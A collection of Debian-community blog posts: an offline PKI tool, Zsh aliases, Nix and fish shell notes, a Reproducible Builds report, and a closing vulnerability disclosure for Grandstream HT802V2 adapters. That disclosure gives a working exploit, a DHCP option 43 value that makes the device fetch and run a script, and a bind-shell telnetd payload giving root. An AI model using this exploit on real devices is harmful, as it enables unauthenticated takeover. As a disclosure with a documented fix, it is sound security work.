The software part offline-pki is a small Python application to manage an offline PKI. It relies on yubikey-manager to manage YubiKeys and cryptography for cryptographic operations not executed on the YubiKeys. The application has some opinionated design choices. Notably, the cryptography is hard-coded to use NIST P-384 elliptic curve. The first step is to reset all your YubiKeys:
$ offline-pki yubikey reset
This will reset the connected YubiKey. Are you sure? [y/N]: y
New PIN code:
Repeat for confirmation:
New PUK code:
Repeat for confirmation:
New management key ('.' to generate a random one):
WARNING[pki-yubikey] Using random management key: e8ffdce07a4e3bd5c0d803aa3948a9c36cfb86ed5a2d5cf533e97b088ae9e629
INFO[pki-yubikey]  0: Yubico YubiKey OTP+FIDO+CCID 00 00
INFO[pki-yubikey] SN: 23854514
INFO[yubikit.management] Device config written
INFO[yubikit.piv] PIV application data reset performed
INFO[yubikit.piv] Management key set
INFO[yubikit.piv] New PUK set
INFO[yubikit.piv] New PIN set
INFO[pki-yubikey] YubiKey reset successful!
Then, generate the root CA and create as many copies as you want:
$ offline-pki certificate root --permitted example.com
Management key for Root X:
Plug YubiKey "Root X"...
INFO[pki-yubikey]  0: Yubico YubiKey CCID 00 00
INFO[pki-yubikey] SN: 23854514
INFO[yubikit.piv] Data written to object slot 0x5fc10a
INFO[yubikit.piv] Certificate written to slot 9C (SIGNATURE), compression=True
INFO[yubikit.piv] Private key imported in slot 9C (SIGNATURE) of type ECCP384
Copy root certificate to another YubiKey? [y/N]: y
Plug YubiKey "Root X"...
INFO[pki-yubikey]  0: Yubico YubiKey CCID 00 00
INFO[pki-yubikey] SN: 23854514
INFO[yubikit.piv] Data written to object slot 0x5fc10a
INFO[yubikit.piv] Certificate written to slot 9C (SIGNATURE), compression=True
INFO[yubikit.piv] Private key imported in slot 9C (SIGNATURE) of type ECCP384
Copy root certificate to another YubiKey? [y/N]: n
You can inspect the result:
$ offline-pki yubikey info
INFO[pki-yubikey]  0: Yubico YubiKey CCID 00 00
INFO[pki-yubikey] SN: 23854514
INFO[pki-yubikey] Slot 9C (SIGNATURE):
INFO[pki-yubikey]   Private key type: ECCP384
INFO[pki-yubikey]   Public key:
INFO[pki-yubikey]     Algorithm:  secp384r1
INFO[pki-yubikey]     Issuer:     CN=Root CA
INFO[pki-yubikey]     Subject:    CN=Root CA
INFO[pki-yubikey]     Serial:     1
INFO[pki-yubikey]     Not before: 2024-07-05T18:17:19+00:00
INFO[pki-yubikey]     Not after:  2044-06-30T18:17:19+00:00
INFO[pki-yubikey]     PEM:
-----BEGIN CERTIFICATE-----
MIIBcjCB+aADAgECAgEBMAoGCCqGSM49BAMDMBIxEDAOBgNVBAMMB1Jvb3QgQ0Ew
HhcNMjQwNzA1MTgxNzE5WhcNNDQwNjMwMTgxNzE5WjASMRAwDgYDVQQDDAdSb290
IENBMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAERg3Vir6cpEtB8Vgo5cAyBTkku/4w
kXvhWlYZysz7+YzTcxIInZV6mpw61o8W+XbxZV6H6+3YHsr/IeigkK04/HJPi6+i
zU5WJHeBJMqjj2No54Nsx6ep4OtNBMa/7T9foyMwITAPBgNVHRMBAf8EBTADAQH/
MA4GA1UdDwEB/wQEAwIBhjAKBggqhkjOPQQDAwNoADBlAjEAwYKy/L8leJyiZSnn
xrY8xv8wkB9HL2TEAI6fC7gNc2bsISKFwMkyAwg+mKFKN2w7AjBRCtZKg4DZ2iUo
6c0BTXC9a3/28V5aydZj6rvx0JqbF/Ln5+RQL6wFMLoPIvCIiCU=
-----END CERTIFICATE-----
Then, you can create an intermediate certificate with offline-pki yubikey intermediate and use it to sign certificates by providing a CSR to offline-pki certificate sign. Be careful and inspect the CSR before signing it, as only the subject name can be overridden. Check the documentation for more details. Get the available options using the --help flag.

The hardware part To ensure the operations on the root and intermediate CAs are air-gapped, a cost-efficient solution is to use an ARM64 single board computer. The Libre Computer Sweet Potato SBC is a more open alternative to the well-known Raspberry Pi.1
Libre Computer Sweet Potato single board computer relying on the Amlogic S905X SOC
Libre Computer Sweet Potato SBC, powered by the AML-S905X SOC
I interact with it through an USB to TTL UART converter:
$ tio /dev/ttyUSB0
[16:40:44.546] tio v3.7
[16:40:44.546] Press ctrl-t q to quit
[16:40:44.555] Connected to /dev/ttyUSB0
GXL:BL1:9ac50e:bb16dc;FEAT:ADFC318C:0;POC:1;RCY:0;SPI:0;0.0;CHK:0;
TE: 36574
BL2 Built : 15:21:18, Aug 28 2019. gxl g1bf2b53 - luan.yuan@droid15-sz
set vcck to 1120 mv
set vddee to 1000 mv
Board ID = 4
CPU clk: 1200MHz
[ ]

The Nix glue To bring everything together, I am using Nix with a Flake providing:
  • a package for the offline-pki application, with shell completion,
  • a development shell, including an editable version of the offline-pki application,
  • a NixOS module to setup the offline PKI, resetting the system at each boot,
  • a QEMU image for testing, and
  • an SD card image to be used on the Sweet Potato or another ARM64 SBC.
# Execute the application locally
nix run github:vincentbernat/offline-pki -- --help
# Run the application inside a QEMU VM
nix run github:vincentbernat/offline-pki\#qemu
# Build a SD card for the Sweet Potato or for the Raspberry Pi
nix build --system aarch64-linux github:vincentbernat/offline-pki\#sdcard.potato
nix build --system aarch64-linux github:vincentbernat/offline-pki\#sdcard.generic
# Get a development shell with the application
nix develop github:vincentbernat/offline-pki

  1. The key for the root CA is not generated by the YubiKey. Using an air-gapped computer is all the more important. Put it in a safe with the YubiKeys when done!

8 March 2025

Vincent Bernat: Auto-expanding aliases in Zsh

To avoid needless typing, the fish shell features command abbreviations to expand some words after pressing space. We can emulate such a feature with Zsh:
# Definition of abbrev-alias for auto-expanding aliases
typeset -ga _vbe_abbrevations
abbrev-alias()  
    alias $1
    _vbe_abbrevations+=($ 1%%\=* )
 
_vbe_zle-autoexpand()  
    local -a words; words=($ (z)LBUFFER )
    if (( $  #_vbe_abbrevations[(r)$ words[-1] ]  )); then
        zle _expand_alias
    fi
    zle magic-space
 
zle -N _vbe_zle-autoexpand
bindkey -M emacs " " _vbe_zle-autoexpand
bindkey -M isearch " " magic-space
# Correct common typos
(( $+commands[git] )) && abbrev-alias gti=git
(( $+commands[grep] )) && abbrev-alias grpe=grep
(( $+commands[sudo] )) && abbrev-alias suod=sudo
(( $+commands[ssh] )) && abbrev-alias shs=ssh
# Save a few keystrokes
(( $+commands[git] )) && abbrev-alias gls="git ls-files"
(( $+commands[ip] )) &&  
  abbrev-alias ip6='ip -6'
  abbrev-alias ipb='ip -brief'
 
# Hard to remember options
(( $+commands[mtr] )) && abbrev-alias mtrr='mtr -wzbe'
Here is a demo where gls is expanded to git ls-files after pressing space:
Auto-expanding gls to git ls-files
I don t auto-expand all aliases. I keep using regular aliases when slightly modifying the behavior of a command or for well-known abbreviations:
alias df='df -h'
alias du='du -h'
alias rm='rm -i'
alias mv='mv -i'
alias ll='ls -ltrhA'

6 March 2025

Antoine Beaupr : Nix Notes

Meta In case you haven't noticed, I'm trying to post and one of the things that entails is to just dump over the fence a bunch of draft notes. In this specific case, I had a set of rough notes about NixOS and particularly Nix, the package manager. In this case, you can see the very birth of an article, what it looks like before it becomes the questionable prose it is now, by looking at the Git history of this file, particularly its birth. I have a couple of those left, and it would be pretty easy to publish them as is, but I feel I'd be doing others (and myself! I write for my own documentation too after all) a disservice by not going the extra mile on those. So here's the long version of my experiment with Nix.

Nix A couple friends are real fans of Nix. Just like I work with Puppet a lot, they deploy and maintain servers (if not fleets of servers) with NixOS and its declarative package management system. Essentially, they use it as a configuration management system, which is pretty awesome. That, however, is a bit too high of a bar for me. I rarely try new operating systems these days: I'm a Debian developer and it takes most of my time to keep that functional. I'm not going to go around messing with other systems as I know that would inevitably get me dragged down into contributing into yet another free software project. I'm mature now and know where to draw the line. Right? So I'm just testing Nix, the package manager, on Debian, because I learned from my friend that nixpkgs is the largest package repository out there, a mind-boggling 100,000 at the time of writing (with 88% of packages up to date), compared to around 40,000 in Debian (or 72,000 if you count binary packages, with 72% up to date). I naively thought Debian was the largest, perhaps competing with Arch, and I was wrong: Arch is larger than Debian too. What brought me there is I wanted to run Harper, a fast spell-checker written in Rust. The logic behind using Nix instead of just downloading the source and running it myself is that I delegate the work of supply-chain integrity checking to a distributor, a bit like you trust Debian developers like myself to package things in a sane way. I know this widens the attack surface to a third party of course, but the rationale is that I shift cryptographic verification to another stack than just "TLS + GitHub" (although that is somewhat still involved) that's linked with my current chain (Debian packages). I have since then stopped using Harper for various reasons and also wrapped up my Nix experiment, but felt it worthwhile to jot down some observations on the project.

Hot take Overall, Nix is hard to get into, with a complicated learning curve. I have found the documentation to be a bit confusing, since there are many ways to do certain things. I particularly tripped on "flakes" and, frankly, incomprehensible error reporting. It didn't help that I tried to run nixpkgs on Debian which is technically possible, but you can tell that I'm not supposed to be doing this. My friend who reviewed this article expressed surprised at how easy this was, but then he only saw the finished result, not me tearing my hair out to make this actually work.

Nix on Debian primer So here's how I got started. First I installed the nix binary package:
apt install nix-bin
Then I had to add myself to the right group and logout/log back in to get the rights to deploy Nix packages:
adduser anarcat nix-users
That wasn't easy to find, but is mentioned in the README.Debian file shipped with the Debian package. Then, I didn't write this down, but the README.Debian file above mentions it, so I think I added a "channel" like this:
nix-channel --add https://nixos.org/channels/nixpkgs-unstable nixpkgs
nix-channel --update
And I likely installed the Harper package with:
nix-env --install harper
At this point, harper was installed in a ... profile? Not sure. I had to add ~/.nix-profile/bin (a symlink to /nix/store/sympqw0zyybxqzz6fzhv03lyivqqrq92-harper-0.10.0/bin) to my $PATH environment for this to actually work.

Side notes on documentation Those last two commands (nix-channel and nix-env) were hard to figure out, which is kind of amazing because you'd think a tutorial on Nix would feature something like this prominently. But three different tutorials failed to bring me up to that basic setup, even the README.Debian didn't spell that out clearly. The tutorials all show me how to develop packages for Nix, not plainly how to install Nix software. This is presumably because "I'm doing it wrong": you shouldn't just "install a package", you should setup an environment declaratively and tell it what you want to do. But here's the thing: I didn't want to "do the right thing". I just wanted to install Harper, and documentation failed to bring me to that basic "hello world" stage. Here's what one of the tutorials suggests as a first step, for example:
curl -L https://nixos.org/nix/install   sh
nix-shell --packages cowsay lolcat
nix-collect-garbage
... which, when you follow through, leaves you with almost precisely nothing left installed (apart from Nix itself, setup with a nasty "curl pipe bash". So while that works in testing Nix, you're not much better off than when you started.

Rolling back everything Now that I have stopped using Harper, I don't need Nix anymore, which I'm sure my Nix friends will be sad to read about. Don't worry, I have notes now, and can try again! But still, I wanted to clear things out, so I did this, as root:
deluser anarcat nix-users
apt purge nix-bin
rm -rf /nix ~/.nix*
I think this cleared things out, but I'm not actually sure.

Side note on Nix drama This blurb wouldn't be complete without a mention that the Nix community has been somewhat tainted by the behavior of its founder. I won't bother you too much with this; LWN covered it well in 2024, and made a followup article about spinoffs and forks that's worth reading as well. I did want to say that everyone I have been in contact with in the Nix community was absolutely fantastic. So I am really sad that the behavior of a single individual can pollute a community in such a way. As a leader, if you have all but one responsability, it's to behave properly for people around you. It's actually really, really hard to do that, because yes, it means you need to act differently than others and no, you just don't get to be upset at others like you would normally do with friends, because you're in a position of authority. It's a lesson I'm still learning myself, to be fair. But at least I don't work with arms manufacturers or, if I would, I would be sure as hell to accept the nick (or nix?) on the chin when people would get upset, and try to make amends. So long live the Nix people! I hope the community recovers from that dark moment, so far it seems like it will. And thanks for helping me test Harper!

5 March 2025

Reproducible Builds: Reproducible Builds in February 2025

Welcome to the second report in 2025 from the Reproducible Builds project. Our monthly reports outline what we ve been up to over the past month, and highlight items of news from elsewhere in the increasingly-important area of software supply-chain security. As usual, however, if you are interested in contributing to the Reproducible Builds project, please visit our Contribute page on our website. Table of contents:
  1. Reproducible Builds at FOSDEM 2025
  2. Reproducible Builds at PyCascades 2025
  3. Does Functional Package Management Enable Reproducible Builds at Scale?
  4. reproduce.debian.net updates
  5. Upstream patches
  6. Distribution work
  7. diffoscope & strip-nondeterminism
  8. Website updates
  9. Reproducibility testing framework

Reproducible Builds at FOSDEM 2025 Similar to last year s event, there was considerable activity regarding Reproducible Builds at FOSDEM 2025, held on on 1st and 2nd February this year in Brussels, Belgium. We count at least four talks related to reproducible builds. (You can also read our news report from last year s event in which Holger Levsen presented in the main track.)
Jelle van der Waa, Holger Levsen and kpcyrd presented in the Distributions track on A Tale of several distros joining forces for a common goal. In this talk, three developers from two different Linux distributions (Arch Linux and Debian), discuss this goal which is, of course, reproducible builds. The presenters discuss both what is shared and different between the two efforts, touching on the history and future challenges alike. The slides of this talk are available to view, as is the full video (30m02s). The talk was also discussed on Hacker News.
Zbigniew J drzejewski-Szmek presented in the ever-popular Python track a on Rewriting .pyc files for fun and reproducibility, i.e. the bytecode files generated by Python in order to speed up module imports: It s been known for a while that those are not reproducible: on different architectures, the bytecode for exactly the same sources ends up slightly different. The slides of this talk are available, as is the full video (28m32s).
In the Nix and NixOS track, Julien Malka presented on the Saturday asking How reproducible is NixOS: We know that the NixOS ISO image is very close to be perfectly reproducible thanks to reproducible.nixos.org, but there doesn t exist any monitoring of Nixpkgs as a whole. In this talk I ll present the findings of a project that evaluated the reproducibility of Nixpkgs as a whole by mass rebuilding packages from revisions between 2017 and 2023 and comparing the results with the NixOS cache. Unfortunately, no video of the talk is available, but there is a blog and article on the results.
Lastly, Simon Tournier presented in the Open Research track on the confluence of GNU Guix and Software Heritage: Source Code Archiving to the Rescue of Reproducible Deployment. Simon s talk describes design and implementation we came up and reports on the archival coverage for package source code with data collected over five years. It opens to some remaining challenges toward a better open and reproducible research. The slides for the talk are available, as is the full video (23m17s).

Reproducible Builds at PyCascades 2025 Vagrant Cascadian presented at this year s PyCascades conference which was held on February 8th and 9th February in Portland, OR, USA. PyCascades is a regional instance of PyCon held in the Pacific Northwest. Vagrant s talk, entitled Re-Py-Ducible Builds caught the audience s attention with the following abstract:
Crank your Python best practices up to 11 with Reproducible Builds! This talk will explore Reproducible Builds by highlighting issues identified in Python projects, from the simple to the seemingly inscrutable. Reproducible Builds is basically the crazy idea that when you build something, and you build it again, you get the exact same thing or even more important, if someone else builds it, they get the exact same thing too.
More info is available on the talk s page.

Does Functional Package Management Enable Reproducible Builds at Scale? On our mailing list last month, Julien Malka, Stefano Zacchiroli and Th o Zimmermann of T l com Paris in-house research laboratory, the Information Processing and Communications Laboratory (LTCI) announced that they had published an article asking the question: Does Functional Package Management Enable Reproducible Builds at Scale? (PDF). This month, however, Ludovic Court s followed up to the original announcement on our mailing list mentioning, amongst other things, the Guix Data Service and how that it shows the reproducibility of GNU Guix over time, as described in a GNU Guix blog back in March 2024.

reproduce.debian.net updates The last few months have seen the introduction of reproduce.debian.net. Announced first at the recent Debian MiniDebConf in Toulouse, reproduce.debian.net is an instance of rebuilderd operated by the Reproducible Builds project. Powering this work is rebuilderd, our server which monitors the official package repositories of Linux distributions and attempt to reproduce the observed results there. This month, however, Holger Levsen:
  • Split packages that are not specific to any architecture away from amd64.reproducible.debian.net service into a new all.reproducible.debian.net page.
  • Increased the number of riscv64 nodes to a total of 4, and added a new amd64 node added thanks to our (now 10-year sponsor), IONOS.
  • Discovered an issue in the Debian build service where some new incoming build-dependencies do not end up historically archived.
  • Uploaded the devscripts package, incorporating changes from Jochen Sprickerhof to the debrebuild script specifically to fix the handling the Rules-Requires-Root header in Debian source packages.
  • Uploaded a number of Rust dependencies of rebuilderd (rust-libbz2-rs-sys, rust-actix-web, rust-actix-server, rust-actix-http, rust-actix-server, rust-actix-http, rust-actix-web-codegen and rust-time-tz) after they were prepared by kpcyrd :
Jochen Sprickerhof also updated the sbuild package to:
  • Obey requests from the user/developer for a different temporary directory.
  • Use the root/superuser for some values of Rules-Requires-Root.
  • Don t pass --root-owner-group to old versions of dpkg.
and additionally requested that many Debian packages are rebuilt by the build servers in order to work around bugs found on reproduce.debian.net. [ ][[ ][ ]
Lastly, kpcyrd has also worked towards getting rebuilderd packaged in NixOS, and Jelle van der Waa picked up the existing pull request for Fedora support within in rebuilderd and made it work with the existing Koji rebuilderd script. The server is being packaged for Fedora in an unofficial copr repository and in the official repositories after all the dependencies are packaged.

Upstream patches The Reproducible Builds project detects, dissects and attempts to fix as many currently-unreproducible packages as possible. We endeavour to send all of our patches upstream where appropriate. This month, we wrote a large number of such patches, including:

Distribution work There as been the usual work in various distributions this month, such as: In Debian, 17 reviews of Debian packages were added, 6 were updated and 8 were removed this month adding to our knowledge about identified issues.
Fedora developers Davide Cavalca and Zbigniew J drzejewski-Szmek gave a talk on Reproducible Builds in Fedora (PDF), touching on SRPM-specific issues as well as the current status and future plans.
Thanks to an investment from the Sovereign Tech Agency, the FreeBSD project s work on unprivileged and reproducible builds continued this month. Notable fixes include:
The Yocto Project has been struggling to upgrade to the latest Go and Rust releases due to reproducibility problems in the newer versions. Hongxu Jia tracked down the issue with Go which meant that the project could upgrade from the 1.22 series to 1.24, with the fix being submitted upstream for review (see above). For Rust, however, the project was significantly behind, but has made recent progress after finally identifying the blocking reproducibility issues. At time of writing, the project is at Rust version 1.82, with patches under review for 1.83 and 1.84 and fixes being discussed with the Rust developers. The project hopes to improve the tests for reproducibility in the Rust project itself in order to try and avoid future regressions. Yocto continues to maintain its ability to binary reproduce all of the recipes in OpenEmbedded-Core, regardless of the build host distribution or the current build path.
Finally, Douglas DeMaio published an article on the openSUSE blog on announcing that the Reproducible-openSUSE (RBOS) Project Hits [Significant] Milestone. In particular:
The Reproducible-openSUSE (RBOS) project, which is a proof-of-concept fork of openSUSE, has reached a significant milestone after demonstrating a usable Linux distribution can be built with 100% bit-identical packages.
This news was also announced on our mailing list by Bernhard M. Wiedemann, who also published another report for openSUSE as well.

diffoscope & strip-nondeterminism diffoscope is our in-depth and content-aware diff utility that can locate and diagnose reproducibility issues. This month, Chris Lamb made the following changes, including preparing and uploading versions 288 and 289 to Debian:
  • Add asar to DIFFOSCOPE_FAIL_TESTS_ON_MISSING_TOOLS in order to address Debian bug #1095057) [ ]
  • Catch a CalledProcessError when calling html2text. [ ]
  • Update the minimal Black version. [ ]
Additionally, Vagrant Cascadian updated diffoscope in GNU Guix to version 287 [ ][ ] and 288 [ ][ ] as well as submitted a patch to update to 289 [ ]. Vagrant also fixed an issue that was breaking reprotest on Guix [ ][ ]. strip-nondeterminism is our sister tool to remove specific non-deterministic results from a completed build. This month version 1.14.1-2 was uploaded to Debian unstable by Holger Levsen.

Website updates There were a large number of improvements made to our website this month, including:

Reproducibility testing framework The Reproducible Builds project operates a comprehensive testing framework running primarily at tests.reproducible-builds.org in order to check packages and other artifacts for reproducibility. In January, a number of changes were made by Holger Levsen, including:
  • reproduce.debian.net-related:
    • Add a helper script to manually schedule packages. [ ][ ][ ][ ][ ]
    • Fix a link in the website footer. [ ]
    • Strip the emojis from package names on the manual rebuilder in order to ease copy-and-paste. [ ]
    • On the various statistics pages, provide the number of affected source packages [ ][ ] as well as provide various totals [ ][ ].
    • Fix graph labels for the various architectures [ ][ ] and make them clickable too [ ][ ][ ].
    • Break the displayed HTML in blocks of 256 packages in order to address rendering issues. [ ][ ]
    • Add monitoring jobs for riscv64 archicture nodes and integrate them elsewhere in our infrastructure. [ ][ ]
    • Add riscv64 architecture nodes. [ ][ ][ ][ ][ ]
    • Update much of the documentation. [ ][ ][ ]
    • Make a number of improvements to the layout and style. [ ][ ][ ][ ][ ][ ][ ]
    • Remove direct links to JSON and database backups. [ ]
    • Drop a Blues Brothers reference from frontpage. [ ]
  • Debian-related:
    • Deal with /boot/vmlinuz* being called vmlinux* on the riscv64 architecture. [ ]
    • Add a new ionos17 node. [ ][ ][ ][ ][ ]
    • Install debian-repro-status on all Debian trixie and unstable jobs. [ ]
  • FreeBSD-related:
    • Switch to run latest branch of FreeBSD. [ ]
  • Misc:
    • Fix /etc/cron.d and /etc/logrotate.d permissions for Jenkins nodes. [ ]
    • Add support for riscv64 architecture nodes. [ ][ ]
    • Grant Jochen Sprickerhof access to the o4 node. [ ]
    • Disable the janitor-setup-worker. [ ][ ]
In addition:
  • kpcyrd fixed the /all/api/ API endpoints on reproduce.debian.net by altering the nginx configuration. [ ]
  • James Addison updated reproduce.debian.net to display the so-called bad reasons hyperlink inline [ ] and merged the Categorized issues links into the Reproduced builds column [ ].
  • Jochen Sprickerhof also made some reproduce.debian.net-related changes, adding support for detecting a bug in the mmdebstrap package [ ] as well as updating some documentation [ ].
  • Roland Clobus continued their work on reproducible live images for Debian, making changes related to new clustering of jobs in openQA. [ ]
And finally, both Holger Levsen [ ][ ][ ] and Vagrant Cascadian performed significant node maintenance. [ ][ ][ ][ ][ ]
If you are interested in contributing to the Reproducible Builds project, please visit our Contribute page on our website. However, you can get in touch with us via:

1 March 2025

Guido G nther: Free Software Activities February 2025

Another short status update of what happened on my side last month. One larger blocks are the Phosh 0.45 release, also reviews took a considerable amount of time. From the fun side debugging bananui and coming up with a fix in phoc as well as setting up a small GSM network using osmocom to test more Cell Broadcast thingies were likely the most fun parts. phosh phoc phosh-osk-stub phosh-tour phosh-mobile-settings pfs libphosh-rs meta-phosh libcmatrix Debian gmobile feedbackd grim Wayland protocols g4music wlroots qbootctl bananui-shell libssc ModemManager Waycheck Bug reports Reviews This is not code by me but reviews on other peoples code. The list is a slightly incomplete. Thanks for the contributions! Help Development If you want to support my work see donations. Comments? Join the Fediverse thread

28 February 2025

Antoine Beaupr : testing the fish shell

I have been testing fish for a couple months now (this file started on 2025-01-03T23:52:15-0500 according to stat(1)), and those are my notes. I suspect people will have Opinions about my comments here. Do not comment unless you have some Constructive feedback to provide: I don't want to know if you think I am holding it Wrong. Consider that I might have used UNIX shells for longer that you have lived. I'm not sure I'll keep using fish, but so far it's the first shell that survived heavy use outside of zsh(1) (unless you count tcsh(1), but that was in another millenia). My normal shell is bash(1), and it's still the shell I used everywhere else than my laptop, as I haven't switched on all the servers I managed, although it is available since August 2022 on torproject.org servers. I first got interested in fish because they ported to Rust, making it one of the rare shells out there written in a "safe" and modern programming language, released after an impressive ~2 year of work with Fish 4.0.

Cool things Current directory gets shortened, ~/wikis/anarc.at/software/desktop/wayland shows up as ~/w/a/s/d/wayland Autocompletion rocks. Default prompt rocks. Doesn't seem vulnerable to command injection assaults, at least it doesn't trip on the git-landmine. It even includes pipe status output, which was a huge pain to implement in bash. Made me realized that if the last command succeeds, we don't see other failures, which is the case of my current prompt anyways! Signal reporting is better than my bash implementation too. So far the only modification I have made to the prompt is to add a printf '\a' to output a bell. By default, fish keeps a directory history (but separate from the pushd stack), that can be navigated with cdh, prevd, and nextd, dirh shows the history.

Less cool I feel there's visible latency in the prompt creation. POSIX-style functions (foo() true ) are unsupported. Instead, fish uses whitespace-sensitive definitions like this:
function foo
    true
end
This means my (modest) collection of POSIX functions need to be ported to fish. Workaround: simple functions can be turned into aliases, which fish supports (but implements using functions). EOF heredocs are considered to be "minor syntactic sugar". I find them frigging useful. Process substitution is split on newlines, not whitespace. you need to pipe through string split -n " " to get the equivalent. <(cmd) doesn't exist: they claim you can use cmd foo - as a replacement, but that's not correct: I used <(cmd) mostly where foo does not support - as a magic character to say 'read from stdin'. Documentation is... limited. It seems mostly geared the web docs which are... okay (but I couldn't find out about ~/.config/fish/conf.d there!), but this is really inconvenient when you're trying to browse the manual pages. For example, fish thinks there's a fish_prompt manual page, according to its own completion mechanism, but man(1) cannot find that manual page. I can't find the manual for the time command (which is actually a keyword!) Fish renders multi-line commands with newlines. So if your terminal looks like this, say:
anarcat@angela:~> sq keyring merge torproject-keyring/lavamind-
95F341D746CF1FC8B05A0ED5D3F900749268E55E.gpg torproject-keyrin
g/weasel-E3ED482E44A53F5BBE585032D50F9EBC09E69937.gpg   wl-copy
... but it's actually one line, when you copy-paste the above, in foot(1), it will show up exactly like this, newlines and all:
sq keyring merge torproject-keyring/lavamind-
95F341D746CF1FC8B05A0ED5D3F900749268E55E.gpg torproject-keyrin
g/weasel-E3ED482E44A53F5BBE585032D50F9EBC09E69937.gpg   wl-copy
Whereas it should show up like this:
sq keyring merge torproject-keyring/lavamind-95F341D746CF1FC8B05A0ED5D3F900749268E55E.gpg torproject-keyring/weasel-E3ED482E44A53F5BBE585032D50F9EBC09E69937.gpg   wl-copy
Note that this is an issue specific to foot(1), alacritty(1) and gnome-terminal(1) don't suffer from that issue. I have already filed it upstream in foot and it is apparently fixed already. Globbing is driving me nuts. You can't pass a * to a command unless fish agrees it's going to match something. You need to escape it if it doesn't immediately match, and then you need the called command to actually support globbing. 202[345] doesn't match folders named 2023, 2024, 2025, it will send the string 202[345] to the command.

Blockers () is like $(): it's process substitution, and not a subshell. This is really impractical: I use ( cd foo ; do_something) all the time to avoid losing the current directory... I guess I'm supposed to use pushd for this, but ouch. This wouldn't be so bad if it was just for cd though. Clean constructs like this:
( git grep -l '^#!/.*bin/python' ; fdfind .py )   sort -u
Turn into what i find rather horrible:
begin; git grep -l '^#!/.*bin/python' ; fdfind .py ; end   sort -ub
It... works, but it goes back to "oh dear, now there's a new langage again". I only found out about this construct while trying:
  git grep -l '^#!/.*bin/python' ; fdfind .py     sort -u 
... which fails and suggests using begin/end, at which point: why not just support the curly braces? FOO=bar is not allowed. It's actually recognized syntax, but creates a warning. We're supposed to use set foo bar instead. This really feels like a needless divergence from standard. Aliases are... peculiar. Typical constructs like alias mv="\mv -i" don't work because fish treats aliases as a function definition, and \ is not magical there. This can be worked around by specifying the full path to the command, with e.g. alias mv="/bin/mv -i". Another problem is trying to override a built-in, which seems completely impossible. In my case, I like the time(1) command the way it is, thank you very much, and fish provides no way to bypass that builtin. It is possible to call time(1) with command time, but it's not possible to replace the command keyword so that means a lot of typing. Again: you can't use \ to bypass aliases. This is a huge annoyance for me. I would need to learn to type command in long form, and I use that stuff pretty regularly. I guess I could alias command to c or something, but this is one of those huge muscle memory challenges. alt . doesn't always work the way i expect.

20 February 2025

Evgeni Golov: Unauthenticated RCE in Grandstream HT802V2 and probably others using gs_test_server DHCP vendor option

The Grandstream HT802V2 uses busybox' udhcpc for DHCP. When a DHCP event occurs, udhcpc calls a script (/usr/share/udhcpc/default.script by default) to further process the received data. On the HT802V2 this is used to (among others) parse the data in DHCP option 43 (vendor) using the Grandstream-specific parser /sbin/parse_vendor.
 
        [ -n "$vendor" ] &&  
                VENDOR_TEST_SERVER=" echo $vendor   parse_vendor   grep gs_test_server   cut -d' ' -f2 "
                if [ -n "$VENDOR_TEST_SERVER" ]; then
                        /app/bin/vendor_test_suite.sh $VENDOR_TEST_SERVER
                fi
 
According to the documentation the format is <option_code><value_length><value>. The only documented option code is 0x01 for the ACS URL. However, if you pass other codes, these are accepted and parsed too. Especially, if you pass 0x05 you get gs_test_server, which is passed in a call to /app/bin/vendor_test_suite.sh. What's /app/bin/vendor_test_suite.sh? It's this nice script:
#!/bin/sh
TEST_SCRIPT=vendor_test.sh
TEST_SERVER=$1
TEST_SERVER_PORT=8080
cd /tmp
wget -q -t 2 -T 5 http://$ TEST_SERVER :$ TEST_SERVER_PORT /$ TEST_SCRIPT  
if [ "$?" = "0" ]; then
    echo "Finished downloading $ TEST_SCRIPT  from http://$ TEST_SERVER :$ TEST_SERVER_PORT "
    chmod +x $ TEST_SCRIPT 
        corefile_dec $ TEST_SCRIPT 
        if [ " head -n 1 $ TEST_SCRIPT  " = "#!/bin/sh" ]; then
                echo "Starting GS Test Suite..."
                ./$ TEST_SCRIPT  http://$ TEST_SERVER :$ TEST_SERVER_PORT 
        fi
fi
It uses the passed value to construct the URL http://<gs_test_server>:8080/vendor_test.sh and download it using wget. We probably can construct a gs_test_server value in a way that wget overwrites some system file, like it was suggested in CVE-2021-37915. But we also can just let the script download the file and execute it for us. The only hurdle is that the downloaded file gets decrypted using corefile_dec and the result needs to have #!/bin/sh as the first line to be executed. I have no idea how the encryption works. But luckily we already have a shell using the OpenVPN exploit and can use /bin/encfile to encrypt things! The result gets correctly decrypted by corefile_dec back to the needed payload. That means we can take a simple payload like:
#!/bin/sh
# you need exactly that shebang, yes
telnetd -l /bin/sh -p 1270 &
Encrypt it using encfile and place it on a webserver as vendor_test.sh. The test machine has the IP 192.168.42.222 and python3 -m http.server 8080 runs the webserver on the right port. This means the value of DHCP option 43 needs to be 05, 14 (the length of the string being the IP address) and 192.168.42.222. In Python:
>>> server = "192.168.42.222"
>>> ":".join([f' y:02x ' for y in [5, len(server)] + [ord(x) for x in server]])
'05:0e:31:39:32:2e:31:36:38:2e:34:32:2e:32:32:32'
So we set DHCP option 43 to 05:0e:31:39:32:2e:31:36:38:2e:34:32:2e:32:32:32 and trigger a DHCP run (/etc/init.d/udhcpc restart if you have a shell, or a plain reboot if you don't). And boom, root shell on port 1270 :) As mentioned earlier, this is closely related to CVE-2021-37915, where a binary was downloaded via TFTP from the gdb_debug_server NVRAM variable or via HTTP from the gs_test_server NVRAM variable. Both of these variables were controllable using the existing gs_config interface after authentication. But using DHCP for the same thing is much nicer, as it removes the need for authentication completely :) Affected devices Fix After disclosing this issue to Grandstream, they have issued a new firmware release (1.0.3.10) which modifies /app/bin/vendor_test_suite.sh to
#!/bin/sh
TEST_SCRIPT=vendor_test.sh
TEST_SERVER=$1
TEST_SERVER_PORT=8080
VENDOR_SCRIPT="/tmp/run_vendor.sh"
cd /tmp
wget -q -t 2 -T 5 http://$ TEST_SERVER :$ TEST_SERVER_PORT /$ TEST_SCRIPT  
if [ "$?" = "0" ]; then
    echo "Finished downloading $ TEST_SCRIPT  from http://$ TEST_SERVER :$ TEST_SERVER_PORT "
    chmod +x $ TEST_SCRIPT 
    prov_image_dec --in $ TEST_SCRIPT  --out $ VENDOR_SCRIPT 
    if [ " head -n 1 $ VENDOR_SCRIPT  " = "#!/bin/sh" ]; then
        echo "Starting GS Test Suite..."
        chmod +x $ VENDOR_SCRIPT 
        $ VENDOR_SCRIPT  http://$ TEST_SERVER :$ TEST_SERVER_PORT 
    fi
fi
The crucial part is that now prov_image_dec is used for the decoding, which actually checks for a signature (like on the firmware image itself), thus preventing loading of malicious scripts. Timeline

12 February 2025

